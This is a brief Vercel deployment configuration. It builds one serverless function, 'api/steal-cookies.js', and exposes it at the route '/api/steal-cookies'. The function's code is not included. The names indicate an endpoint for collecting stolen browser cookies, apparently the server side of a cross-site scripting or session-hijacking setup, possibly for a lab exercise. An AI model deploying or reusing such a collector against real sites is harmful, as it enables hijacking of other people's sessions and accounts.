{
    "version": 2,
    "builds": [
      {
        "src": "api/steal-cookies.js",
        "use": "@vercel/node"
      }
    ],
    "routes": [
      {
        "src": "/api/steal-cookies",
        "dest": "/api/steal-cookies.js"
      }
    ]
  }
  